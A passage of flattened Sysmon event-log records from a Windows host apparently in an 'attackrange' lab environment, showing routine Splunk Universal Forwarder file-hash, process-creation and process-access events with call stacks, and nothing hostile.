Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=311569B2FE07E2DF4A0B96CFD89D7E37,SHA256=0D6450848BC797E488189A9612CEE9F2B9370C96BE685B75BE8FF1A89A65E995,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808987Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:23.462{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D1A38797A9CCF4A2B2CBD214023504E,SHA256=8A0C09A4BCB0AA46DF51BD3CF92B0FD00252004AA1F2A7A86099D63B05159A03,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809002Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:24.525{0C1E0330-F698-60EB-AB79-00000000D001}39323348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000809001Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:24.478{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A17702CB2159088B138DE0FD02BA3631,SHA256=C376D42C9AA4F44E7C5806DEB396FF3B38D7948517CB230C372B63896179E25D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809000Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:24.353{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F698-60EB-AB79-00000000D001}3932C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808999Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:24.353{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808998Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:24.353{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808997Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:24.353{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808996Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:24.353{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808995Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:24.353{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808994Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:24.353{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808993Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:24.353{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808992Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:24.353{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808991Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:24.353{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808990Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:24.353{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F698-60EB-AB79-00000000D001}3932C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808989Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:24.353{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F698-60EB-AB79-00000000D001}3932C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808988Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:24.338{0C1E0330-F698-60EB-AB79-00000000D001}3932C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000809032Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.884{0C1E0330-F699-60EB-AD79-00000000D001}18681876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809031Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.743{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F699-60EB-AD79-00000000D001}1868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809030Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.743{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809029Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.743{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809028Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.728{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809027Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.728{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809026Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.728{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809025Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.728{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809024Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.728{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809023Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.728{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809022Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.728{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809021Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:25.728{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F699-60EB-AD79-00000000D001}1868C:\Program 